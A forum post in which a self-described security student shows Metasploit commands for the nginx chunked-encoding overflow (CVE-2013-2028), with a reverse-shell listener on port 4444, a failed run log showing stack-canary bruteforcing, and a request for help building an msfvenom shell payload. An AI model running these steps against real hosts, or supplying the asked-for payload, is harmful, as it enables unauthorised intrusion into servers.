Explotation of nginx_chucked_size vulnerabilities
May 31, 2022 11:43AM
Hello world!

I currently studying the system engineering carrer. And one of the course named "Data security". In one ficticius case, The professor order to exploit a host(really is a vmware virtual machine) of "Aeronautical company(in this case could be Boeing or Lockheed)" and later expose him some recomendations in order to avoid future intrumission. This is part of exam or academic activity. Well, I made a vulnerabily scaning with nse script and the scanner return me the following vulns:[CVE-2013-2028] The ngx_http_parse_chunked_function(in CVE database) and return me the exploitdb as well [25775] Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit). I download the script and followed the next steps:

msf6 exploit(linux/remote/25775) > set ReverseListenerBindAddress #I set my private ip
ReverseListenerBindAddress =>
msf6 exploit(linux/remote/25775) > set LHOST 190.*******121 #I supposed due the host is remote, I should set my ip public.
msf6 exploit(linux/remote/25775) > set ReverseListenerBindPort 4444
ReverseListenerBindPort => 4444
msf6 exploit(linux/remote/25775) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/remote/25775) > run

But this is what msfconsole return me:

[*] Started reverse TCP handler on
[*] - 200.******:80 - Searching for stack canary
[*] - 200.******175:80 - Assuming byte 0 0x00
[*] - 200******175:80 - Bruteforcing byte 1
[*] - 200******175:80 - Bruteforcing byte 2
[-] - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (200.*****175:80) timed out.
[*] Exploit completed, but no session was created

Now, I'd like to make clear some of my consideration.

First: At the begining, I though that could be a firewall blocking the conection on port 4444. So i used the comand sudo ufw allow 4444 and return me the message: Rule Added(v6). But still without working.

Second: I believe the main error is the payload. I saw in other examples that I must to create a payload with msfvenom who adapts better to default exploit. But the problem is that I tried without any satisfactory result. Could you please tell me how to create a payload that open a shell on virtual machine. The host executes linux kernel 4.4x(probably is ubuntu 16.04).

Third: If you know the nginx server, could you please tell me what is the best way to exploit one?

Pd: This is not way a illegal activities, just is a evaluted activity that course professor orders to do

Thanks and I'd apreciate the help!
Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 118
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready